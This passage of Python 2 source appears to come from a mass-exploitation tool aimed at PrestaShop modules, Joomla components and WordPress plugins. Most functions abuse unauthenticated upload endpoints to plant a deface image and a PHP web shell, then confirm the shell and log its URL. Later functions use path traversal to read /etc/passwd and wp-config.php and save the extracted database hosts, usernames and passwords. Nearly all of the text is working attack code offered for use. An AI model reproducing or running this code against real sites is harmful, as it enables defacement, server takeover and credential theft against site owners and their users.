2391. writer.write(ShellPath + '\n')
2392. else:
2393. self.Print_NotVuln('attributewizardpro', site)
2394. else:
2395. self.Print_NotVuln('attributewizardpro', site)
2396. except:
2397. self.Print_NotVuln('attributewizardpro', site)
2398.  
2399.  
2400. def attributewizardpro2(self, site):
2401. try:
2402. Exp = site + '/modules/1attributewizardpro/file_upload.php'
2403. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2404. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2405. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2406. if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
2407. Index = GoT.text.encode('utf-8').split('|||')[0]
2408. print Index
2409. IndexPath = site + '/modules/1attributewizardpro/file_uploads/' + Index
2410. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
2411. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2412. self.Print_Vuln_index(IndexPath)
2413. with open('result/Index_results.txt', 'a') as writer:
2414. writer.write(IndexPath + '\n')
2415. Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2416. if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
2417. Shell = Got2.text.encode('utf-8').split('|||')[0]
2418. ShellPath = site + '/modules/1attributewizardpro/file_uploads/' + Shell
2419. CheckShell = requests.get('http://' + ShellPath, timeout=5)
2420. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2421. self.Print_vuln_Shell(ShellPath)
2422. with open('result/Shell_results.txt', 'a') as writer:
2423. writer.write(ShellPath + '\n')
2424. else:
2425. self.Print_NotVuln('1attributewizardpro', site)
2426. else:
2427. self.Print_NotVuln('1attributewizardpro', site)
2428. except:
2429. self.Print_NotVuln('1attributewizardpro', site)
2430.  
2431. def attributewizardpro3(self, site):
2432. try:
2433. Exp = site + '/modules/attributewizardpro.OLD/file_upload.php'
2434. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2435. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2436. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2437. if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
2438. Index = GoT.text.encode('utf-8').split('|||')[0]
2439. print Index
2440. IndexPath = site + '/modules/attributewizardpro.OLD/file_uploads/' + Index
2441. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
2442. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2443. self.Print_Vuln_index(IndexPath)
2444. with open('result/Index_results.txt', 'a') as writer:
2445. writer.write(IndexPath + '\n')
2446. Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2447. if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
2448. Shell = Got2.text.encode('utf-8').split('|||')[0]
2449. ShellPath = site + '/modules/attributewizardpro.OLD/file_uploads/' + Shell
2450. CheckShell = requests.get('http://' + ShellPath, timeout=5)
2451. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2452. self.Print_vuln_Shell(ShellPath)
2453. with open('result/Shell_results.txt', 'a') as writer:
2454. writer.write(ShellPath + '\n')
2455. else:
2456. self.Print_NotVuln('attributewizardpro.OLD', site)
2457. else:
2458. self.Print_NotVuln('attributewizardpro.OLD', site)
2459. except:
2460. self.Print_NotVuln('attributewizardpro.OLD', site)
2461.  
2462. def attributewizardpro_x(self, site):
2463. try:
2464. Exp = site + '/modules/attributewizardpro_x/file_upload.php'
2465. FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
2466. FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
2467. GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2468. if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
2469. Index = GoT.text.encode('utf-8').split('|||')[0]
2470. print Index
2471. IndexPath = site + '/modules/attributewizardpro_x/file_uploads/' + Index
2472. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
2473. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2474. self.Print_Vuln_index(IndexPath)
2475. with open('result/Index_results.txt', 'a') as writer:
2476. writer.write(IndexPath + '\n')
2477. Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
2478. if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
2479. Shell = Got2.text.encode('utf-8').split('|||')[0]
2480. ShellPath = site + '/modules/attributewizardpro_x/file_uploads/' + Shell
2481. CheckShell = requests.get('http://' + ShellPath, timeout=5)
2482. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2483. self.Print_vuln_Shell(ShellPath)
2484. with open('result/Shell_results.txt', 'a') as writer:
2485. writer.write(ShellPath + '\n')
2486. else:
2487. self.Print_NotVuln('attributewizardpro_x', site)
2488. else:
2489. self.Print_NotVuln('attributewizardpro_x', site)
2490. except:
2491. self.Print_NotVuln('attributewizardpro_x', site)
2492.  
2493. def advancedslider(self, site):
2494. try:
2495. Exp = site + '/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php'
2496. Checkvuln = requests.get('http://' + Exp, timeout=5)
2497. FileDataIndex = {'qqfile': open(self.Jce_Deface_image, 'rb')}
2498. if Checkvuln.status_code == 200:
2499. requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2500. IndexPath = site + '/modules/advancedslider/uploads/' + self.Jce_Deface_image.split('/')[1]
2501. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
2502. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2503. self.Print_Vuln_index(IndexPath)
2504. with open('result/Index_results.txt', 'a') as writer:
2505. writer.write(IndexPath + '\n')
2506. else:
2507. self.Print_NotVuln('advancedslider', site)
2508. else:
2509. self.Print_NotVuln('advancedslider', site)
2510. except:
2511. self.Print_NotVuln('advancedslider', site)
2512.  
2513. def cartabandonmentpro(self, site):
2514. try:
2515. Exp = site + '/modules/cartabandonmentpro/upload.php'
2516. Checkvuln = requests.get('http://' + Exp, timeout=5)
2517. FileDataIndex = {'image': open(self.Jce_Deface_image, 'rb')}
2518. if Checkvuln.status_code == 200:
2519. requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2520. IndexPath = site + '/modules/cartabandonmentpro/uploads/' + self.Jce_Deface_image.split('/')[1]
2521. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
2522. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2523. self.Print_Vuln_index(IndexPath)
2524. with open('result/Index_results.txt', 'a') as writer:
2525. writer.write(IndexPath + '\n')
2526. else:
2527. self.Print_NotVuln('cartabandonmentpro', site)
2528. else:
2529. self.Print_NotVuln('cartabandonmentpro', site)
2530. except:
2531. self.Print_NotVuln('cartabandonmentpro', site)
2532.  
2533. def cartabandonmentproOld(self, site):
2534. try:
2535. Exp = site + '/modules/cartabandonmentproOld/upload.php'
2536. Checkvuln = requests.get('http://' + Exp, timeout=5)
2537. FileDataIndex = {'image': open(self.Jce_Deface_image, 'rb')}
2538. if Checkvuln.status_code == 200:
2539. requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2540. IndexPath = site + '/modules/cartabandonmentproOld/uploads/' + self.Jce_Deface_image.split('/')[1]
2541. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
2542. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2543. self.Print_Vuln_index(IndexPath)
2544. with open('result/Index_results.txt', 'a') as writer:
2545. writer.write(IndexPath + '\n')
2546. else:
2547. self.Print_NotVuln('cartabandonmentproOld', site)
2548. else:
2549. self.Print_NotVuln('cartabandonmentproOld', site)
2550. except:
2551. self.Print_NotVuln('cartabandonmentproOld', site)
2552.  
2553. def videostab(self, site):
2554. try:
2555. Exp = site + '/modules/videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload'
2556. Checkvuln = requests.get('http://' + Exp, timeout=5)
2557. FileDataIndex = {'qqfile': open(self.Jce_Deface_image, 'rb')}
2558. if Checkvuln.status_code == 200:
2559. requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2560. IndexPath = site + '/modules/videostab/uploads/' + self.Jce_Deface_image.split('/')[1]
2561. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
2562. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2563. self.Print_Vuln_index(IndexPath)
2564. with open('result/Index_results.txt', 'a') as writer:
2565. writer.write(IndexPath + '\n')
2566. else:
2567. self.Print_NotVuln('videostab', site)
2568. else:
2569. self.Print_NotVuln('videostab', site)
2570. except:
2571. self.Print_NotVuln('videostab', site)
2572.  
2573. def wg24themeadministration(self, site):
2574. Exl = site + '/modules/wg24themeadministration/wg24_ajax.php'
2575. try:
2576. Checkvuln = requests.get('http://' + Exl, timeout=5)
2577. if Checkvuln.status_code == 200:
2578. PostData = {'data': 'bajatax',
2579. 'type': 'pattern_upload'}
2580. FileDataIndex = {'bajatax': open(self.Jce_Deface_image, 'rb')}
2581. FileDataShell = {'bajatax': open(self.ShellPresta, 'rb')}
2582. uploadedPathIndex = site + '/modules/wg24themeadministration/img/upload/' + self.Jce_Deface_image.split('/')[1]
2583. uploadedPathShell = site + '/modules/wg24themeadministration/img/upload/' + self.ShellPresta.split('/')[1]
2584. requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5)
2585. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
2586. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2587. self.Print_Vuln_index(uploadedPathIndex)
2588. with open('result/Index_results.txt', 'a') as writer:
2589. writer.write(uploadedPathIndex + '\n')
2590. requests.post('http://' + Exl, files=FileDataShell, data=PostData, timeout=5)
2591. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
2592. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2593. self.Print_vuln_Shell(uploadedPathShell)
2594. with open('result/Shell_results.txt', 'a') as writer:
2595. writer.write(uploadedPathShell + '\n')
2596. else:
2597. self.Print_NotVuln('wg24themeadministration', site)
2598. else:
2599. self.Print_NotVuln('wg24themeadministration', site)
2600. except:
2601. self.Print_NotVuln('wg24themeadministration', site)
2602.  
2603.  
2604. def fieldvmegamenu(self, site):
2605. Exl = site + '/modules/fieldvmegamenu/ajax/upload.php'
2606. try:
2607. Checkvuln = requests.get('http://' + Exl, timeout=5)
2608. if Checkvuln.status_code == 200:
2609. FileDataIndex = {'images[]': open(self.Jce_Deface_image, 'rb')}
2610. FileDataShell = {'images[]': open(self.ShellPresta, 'rb')}
2611. uploadedPathIndex = site + '/modules/fieldvmegamenu/uploads/' + self.Jce_Deface_image.split('/')[1]
2612. uploadedPathShell = site + '/modules/fieldvmegamenu/uploads/' + self.ShellPresta.split('/')[1]
2613. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
2614. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
2615. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2616. self.Print_Vuln_index(uploadedPathIndex)
2617. with open('result/Index_results.txt', 'a') as writer:
2618. writer.write(uploadedPathIndex + '\n')
2619. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
2620. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
2621. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2622. self.Print_vuln_Shell(uploadedPathShell)
2623. with open('result/Shell_results.txt', 'a') as writer:
2624. writer.write(uploadedPathShell + '\n')
2625. else:
2626. self.Print_NotVuln('fieldvmegamenu', site)
2627. else:
2628. self.Print_NotVuln('fieldvmegamenu', site)
2629. except:
2630. self.Print_NotVuln('fieldvmegamenu', site)
2631.  
2632. def wdoptionpanel(self, site):
2633. Exl = site + '/modules/wdoptionpanel/wdoptionpanel_ajax.php'
2634. try:
2635. Checkvuln = requests.get('http://' + Exl, timeout=5)
2636. if Checkvuln.status_code == 200:
2637. PostData = {'data': 'bajatax',
2638. 'type': 'image_upload'}
2639. FileDataIndex = {'bajatax': open(self.Jce_Deface_image, 'rb')}
2640. FileDataShell = {'bajatax': open(self.ShellPresta, 'rb')}
2641. uploadedPathIndex = site + '/modules/wdoptionpanel/upload/' + self.Jce_Deface_image.split('/')[1]
2642. uploadedPathShell = site + '/modules/wdoptionpanel/upload/' + self.ShellPresta.split('/')[1]
2643. requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5)
2644. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
2645. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2646. self.Print_Vuln_index(uploadedPathIndex)
2647. with open('result/Index_results.txt', 'a') as writer:
2648. writer.write(uploadedPathIndex + '\n')
2649. requests.post('http://' + Exl, files=FileDataShell, data=PostData, timeout=5)
2650. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
2651. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2652. self.Print_vuln_Shell(uploadedPathShell)
2653. with open('result/Shell_results.txt', 'a') as writer:
2654. writer.write(uploadedPathShell + '\n')
2655. else:
2656. self.Print_NotVuln('wdoptionpanel', site)
2657. else:
2658. self.Print_NotVuln('wdoptionpanel', site)
2659. except:
2660. self.Print_NotVuln('wdoptionpanel', site)
2661.  
2662.  
2663. def pk_flexmenu(self, site):
2664. Exl = site + '/modules/pk_flexmenu/ajax/upload.php'
2665. try:
2666. Checkvuln = requests.get('http://' + Exl, timeout=5)
2667. if Checkvuln.status_code == 200:
2668. FileDataIndex = {'images[]': open(self.Jce_Deface_image, 'rb')}
2669. FileDataShell = {'images[]': open(self.ShellPresta, 'rb')}
2670. uploadedPathIndex = site + '/modules/pk_flexmenu/uploads/' + self.Jce_Deface_image.split('/')[1]
2671. uploadedPathShell = site + '/modules/pk_flexmenu/uploads/' + self.ShellPresta.split('/')[1]
2672. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
2673. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
2674. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2675. self.Print_Vuln_index(uploadedPathIndex)
2676. with open('result/Index_results.txt', 'a') as writer:
2677. writer.write(uploadedPathIndex + '\n')
2678. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
2679. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
2680. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2681. self.Print_vuln_Shell(uploadedPathShell)
2682. with open('result/Shell_results.txt', 'a') as writer:
2683. writer.write(uploadedPathShell + '\n')
2684. else:
2685. self.Print_NotVuln('pk_flexmenu', site)
2686. else:
2687. self.Print_NotVuln('pk_flexmenu', site)
2688. except:
2689. self.Print_NotVuln('pk_flexmenu', site)
2690.  
2691.  
2692. def nvn_export_orders(self, site):
2693. Exl = site + '/modules/nvn_export_orders/upload.php'
2694. try:
2695. Checkvuln = requests.get('http://' + Exl, timeout=5)
2696. if Checkvuln.status_code == 200:
2697. FileDataIndex = {'images[]': open(self.Jce_Deface_image, 'rb')}
2698. FileDataShell = {'images[]': open(self.ShellPresta, 'rb')}
2699. uploadedPathIndex = site + '/modules/nvn_export_orders/' + self.Jce_Deface_image.split('/')[1]
2700. uploadedPathShell = site + '/modules/nvn_export_orders/' + self.ShellPresta.split('/')[1]
2701. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
2702. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
2703. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2704. self.Print_Vuln_index(uploadedPathIndex)
2705. with open('result/Index_results.txt', 'a') as writer:
2706. writer.write(uploadedPathIndex + '\n')
2707. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
2708. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
2709. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2710. self.Print_vuln_Shell(uploadedPathShell)
2711. with open('result/Shell_results.txt', 'a') as writer:
2712. writer.write(uploadedPathShell + '\n')
2713. else:
2714. self.Print_NotVuln('nvn_export_orders', site)
2715. else:
2716. self.Print_NotVuln('nvn_export_orders', site)
2717. except:
2718. self.Print_NotVuln('nvn_export_orders', site)
2719.  
2720. def megamenu(self, site):
2721. try:
2722. Exp = site + '/modules/megamenu/uploadify/uploadify.php?id=pwn'
2723. Checkvuln = requests.get('http://' + Exp, timeout=5)
2724. FileDataIndex = {'Filedata': open(self.Jce_Deface_image, 'rb')}
2725. if Checkvuln.status_code == 200:
2726. requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
2727. IndexPath = site + '/' + self.Jce_Deface_image.split('/')[1]
2728. CheckIndex = requests.get('http://' + IndexPath, timeout=5)
2729. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2730. self.Print_Vuln_index(IndexPath)
2731. with open('result/Index_results.txt', 'a') as writer:
2732. writer.write(IndexPath + '\n')
2733. else:
2734. self.Print_NotVuln('megamenu', site)
2735. else:
2736. self.Print_NotVuln('megamenu', site)
2737. except:
2738. self.Print_NotVuln('megamenu', site)
2739.  
2740.  
2741.  
2742. def tdpsthemeoptionpanel(self, site):
2743. Exl = site + '/modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php'
2744. try:
2745. Checkvuln = requests.get('http://' + Exl, timeout=5)
2746. if Checkvuln.status_code == 200:
2747. FileDataIndex = {'image_upload': open(self.Jce_Deface_image, 'rb')}
2748. FileDataShell = {'image_upload': open(self.ShellPresta, 'rb')}
2749. uploadedPathIndex = site + '/modules/tdpsthemeoptionpanel/upload/' + self.Jce_Deface_image.split('/')[1]
2750. uploadedPathShell = site + '/modules/tdpsthemeoptionpanel/upload/' + self.ShellPresta.split('/')[1]
2751. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
2752. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
2753. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2754. self.Print_Vuln_index(uploadedPathIndex)
2755. with open('result/Index_results.txt', 'a') as writer:
2756. writer.write(uploadedPathIndex + '\n')
2757. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
2758. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
2759. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2760. self.Print_vuln_Shell(uploadedPathShell)
2761. with open('result/Shell_results.txt', 'a') as writer:
2762. writer.write(uploadedPathShell + '\n')
2763. else:
2764. self.Print_NotVuln('tdpsthemeoptionpanel', site)
2765. else:
2766. self.Print_NotVuln('tdpsthemeoptionpanel', site)
2767. except:
2768. self.Print_NotVuln('tdpsthemeoptionpanel', site)
2769.  
2770. def psmodthemeoptionpanel(self, site):
2771. Exl = site + '/modules/psmodthemeoptionpanel/psmodthemeoptionpanel_ajax.php'
2772. try:
2773. Checkvuln = requests.get('http://' + Exl, timeout=5)
2774. if Checkvuln.status_code == 200:
2775. FileDataIndex = {'image_upload': open(self.Jce_Deface_image, 'rb')}
2776. FileDataShell = {'image_upload': open(self.ShellPresta, 'rb')}
2777. uploadedPathIndex = site + '/modules/psmodthemeoptionpanel/upload/' + self.Jce_Deface_image.split('/')[1]
2778. uploadedPathShell = site + '/modules/psmodthemeoptionpanel/upload/' + self.ShellPresta.split('/')[1]
2779. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
2780. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
2781. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2782. self.Print_Vuln_index(uploadedPathIndex)
2783. with open('result/Index_results.txt', 'a') as writer:
2784. writer.write(uploadedPathIndex + '\n')
2785. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
2786. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
2787. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2788. self.Print_vuln_Shell(uploadedPathShell)
2789. with open('result/Shell_results.txt', 'a') as writer:
2790. writer.write(uploadedPathShell + '\n')
2791. else:
2792. self.Print_NotVuln('psmodthemeoptionpanel', site)
2793. else:
2794. self.Print_NotVuln('psmodthemeoptionpanel', site)
2795. except:
2796. self.Print_NotVuln('psmodthemeoptionpanel', site)
2797.  
2798.  
2799. def lib(self, site):
2800. Exl = site + '/modules/lib/redactor/file_upload.php'
2801. try:
2802. Checkvuln = requests.get('http://' + Exl, timeout=5)
2803. if Checkvuln.status_code == 200:
2804. FileDataIndex = {'file': open(self.Jce_Deface_image, 'rb')}
2805. FileDataShell = {'file': open(self.ShellPresta, 'rb')}
2806. uploadedPathIndex = site + '/masseditproduct/uploads/file/' + self.Jce_Deface_image.split('/')[1]
2807. uploadedPathShell = site + '/masseditproduct/uploads/file/' + self.ShellPresta.split('/')[1]
2808. requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
2809. CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
2810. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2811. self.Print_Vuln_index(uploadedPathIndex)
2812. with open('result/Index_results.txt', 'a') as writer:
2813. writer.write(uploadedPathIndex + '\n')
2814. requests.post('http://' + Exl, files=FileDataShell, timeout=5)
2815. Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
2816. if 'Vuln!!' in Checkshell.text.encode('utf-8'):
2817. self.Print_vuln_Shell(uploadedPathShell)
2818. with open('result/Shell_results.txt', 'a') as writer:
2819. writer.write(uploadedPathShell + '\n')
2820. else:
2821. self.Print_NotVuln('lib', site)
2822. else:
2823. self.Print_NotVuln('lib', site)
2824. except:
2825. self.Print_NotVuln('lib', site)
2826.  
2827. def Com_Jbcatalog(self, site):
2828. Check = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php', timeout=10)
2829. if Check.status_code == 200:
2830. ShellFile = {'files[]': open(self.ShellPresta, 'rb')}
2831. requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
2832. files=ShellFile)
2833. CheckShell = requests.get('http://' + site +
2834. '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php', timeout=5)
2835.  
2836. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2837. self.Print_vuln_Shell(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php')
2838. with open('result/Shell_results.txt', 'a') as writer:
2839. writer.write(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php\n')
2840. else:
2841. ShellFile = {'files[]': open(self.Jce_Deface_image, 'rb')}
2842. requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
2843. files=ShellFile)
2844.  
2845. CheckIndex = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/'
2846. 'php/files/' + self.Jce_Deface_image.split('/')[1])
2847. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2848. self.Print_Vuln_index(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/'
2849. + self.Jce_Deface_image.split('/')[1])
2850. with open('result/Index_results.txt', 'a') as writer:
2851. writer.write(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/'
2852. + self.Jce_Deface_image.split('/')[1] + '\n')
2853. else:
2854. self.Print_NotVuln('Com_Jbcatalog', site)
2855. else:
2856. self.Print_NotVuln('Com_Jbcatalog', site)
2857.  
2858.  
2859.  
2860. def Com_SexyContactform(self, site):
2861. Check = requests.get('http://' + site + '/components/com_sexycontactform/fileupload/', timeout=10)
2862. if Check.status_code == 200:
2863. IndeX = {'files[]': open(self.Jce_Deface_image, 'rb')}
2864. ShellFile = {'files[]': open(self.ShellPresta, 'rb')}
2865. requests.post('http://' + site + '/components/com_sexycontactform/fileupload/',
2866. files=ShellFile, timeout=10)
2867. CheckShell = requests.get('http://' + site +
2868. '/components/com_sexycontactform/fileupload/files/up.php', timeout=5)
2869.  
2870. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2871. self.Print_vuln_Shell(site + '/components/com_sexycontactform/fileupload/files/up.php')
2872. with open('result/Shell_results.txt', 'a') as writer:
2873. writer.write(site + '/components/com_sexycontactform/fileupload/files/up.php\n')
2874. else:
2875. requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
2876. files=IndeX)
2877.  
2878. CheckIndex = requests.get('http://' + site + '/components/com_sexycontactform/fileupload/files/'
2879. + self.Jce_Deface_image.split('/')[1])
2880. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2881. self.Print_Vuln_index(site + '/components/com_sexycontactform/fileupload/files/'
2882. + self.Jce_Deface_image.split('/')[1])
2883. with open('result/Index_results.txt', 'a') as writer:
2884. writer.write(site + '/components/com_sexycontactform/fileupload/files/'
2885. + self.Jce_Deface_image.split('/')[1] + '\n')
2886. else:
2887. self.Print_NotVuln('Com_SexyContactform', site)
2888. else:
2889. self.Print_NotVuln('Com_SexyContactform', site)
2890.  
2891.  
2892. def Com_rokdownloads(self, site):
2893. Check = requests.get('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
2894. timeout=10)
2895. if Check.status_code == 200 or Check.status_code == 500:
2896. IndeX = {'files[]': open(self.Jce_Deface_image, 'rb')}
2897.  
2898. ShellFile = {'files[]': open(self.ShellPresta, 'rb')}
2899. Datapost = {'jpath': '../../../../'}
2900. requests.post('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
2901. files=ShellFile, data=Datapost, timeout=10)
2902. CheckShell = requests.get('http://' + site +
2903. '/images/stories/up.php', timeout=5)
2904.  
2905. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
2906. self.Print_vuln_Shell(site + '/images/stories/up.php')
2907. with open('result/Shell_results.txt', 'a') as writer:
2908. writer.write(site + '/images/stories/up.php\n')
2909. else:
2910. requests.post('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
2911. files=IndeX, data=Datapost, timeout=10)
2912.  
2913. CheckIndex = requests.get('http://' + site + '/images/stories/' + self.Jce_Deface_image.split('/')[1])
2914. if 'GIF89a' in CheckIndex.text.encode('utf-8'):
2915. self.Print_Vuln_index(site + '/images/stories/' + self.Jce_Deface_image.split('/')[1])
2916. with open('result/Index_results.txt', 'a') as writer:
2917. writer.write(site + '/images/stories/' + self.Jce_Deface_image.split('/')[1] + '\n')
2918. else:
2919. self.Print_NotVuln('Com_rokdownloads', site)
2920. else:
2921. self.Print_NotVuln('Com_rokdownloads', site)
2922.  
2923. def wp_miniaudioplayer(self, site):
2924. CheckVuln = requests.get('http://' + site, timeout=10)
2925. if 'wp-miniaudioplayer' in CheckVuln.text.encode('utf-8'):
2926. etc = requests.get('http://' + site +
2927. '/wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=/etc/passwd', timeout=5)
2928. if 'nologin' in etc.text.encode('utf-8'):
2929. with open('result/Passwd_file.text', 'a') as writer:
2930. writer.write('---------------------------\nSite: ' + site + '\n' + etc.text.encode('utf-8') + '\n')
2931. self.Print_Vuln('wp-miniaudioplayer', site)
2932. else:
2933. self.Print_NotVuln('wp-miniaudioplayer', site)
2934. else:
2935. self.Print_NotVuln('wp-miniaudioplayer', site)
2936.  
2937.  
2938. def wp_support_plus_responsive_ticket_system(self, site):
2939. try:
2940. Exp = 'http://' + site + \
2941. '/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/' \
2942. 'downloadAttachment.php?path=../../../../../wp-config.php'
2943. GetConfig = requests.get(Exp, timeout=5)
2944. if 'DB_PASSWORD' in GetConfig.text.encode('utf-8'):
2945. self.Print_vuln_Config(site)
2946. with open('result/Config_results.txt', 'a') as ww:
2947. ww.write('Full Config Path : ' + Exp + '\n')
2948. try:
2949. Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.text.encode('utf-8'))
2950. Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.text.encode('utf-8'))
2951. Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.text.encode('utf-8'))
2952. Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.text.encode('utf-8'))
2953. with open('result/Config_results.txt', 'a') as ww:
2954. ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] +
2955. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
2956. 0] + '\n---------------------\n')
2957. except:
2958. self.Print_NotVuln('wp-support-plus-responsive-ticket-system', site)
2959. else:
2960. self.Print_NotVuln('wp-support-plus-responsive-ticket-system', site)
2961. except:
2962. self.Print_NotVuln('wp-support-plus-responsive-ticket-system', site)
2963.  
2964. def eshop_magic(self, site):
2965. try:
2966. Exp = 'http://' + site + \
2967. 'wp-content/plugins/eshop-magic/download.php?file=../../../../wp-config.php'
2968. GetConfig = requests.get(Exp, timeout=5)
2969. if 'DB_PASSWORD' in GetConfig.text.encode('utf-8'):
2970. self.Print_vuln_Config(site)
2971. with open('result/Config_results.txt', 'a') as ww:
2972. ww.write('Full Config Path : ' + Exp + '\n')
2973. try:
2974. Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.text.encode('utf-8'))
2975. Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.text.encode('utf-8'))
2976. Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.text.encode('utf-8'))
2977. Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.text.encode('utf-8'))
2978. with open('result/Config_results.txt', 'a') as ww:
2979. ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] +
2980. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
2981. 0] + '\n---------------------\n')
2982. except:
2983. self.Print_NotVuln('eshop-magic', site)
2984. else:
2985. self.Print_NotVuln('eshop-magic', site)
2986. except:
2987. self.Print_NotVuln('eshop-magic', site)
2988.  
2989. def ungallery(self, site):
2990. try:
2991. Exp = 'http://' + site + \
2992. '/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php'
2993. GetConfig = requests.get(Exp, timeout=5)
